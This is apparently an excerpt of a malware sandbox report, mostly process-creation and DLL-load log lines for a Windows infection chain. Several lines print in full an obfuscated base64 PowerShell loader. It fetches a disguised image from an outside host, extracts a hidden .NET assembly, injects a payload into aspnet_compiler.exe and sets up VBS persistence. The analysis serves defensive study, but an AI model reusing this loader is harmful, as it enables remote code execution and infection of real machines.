'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologicallyJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologicallyJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
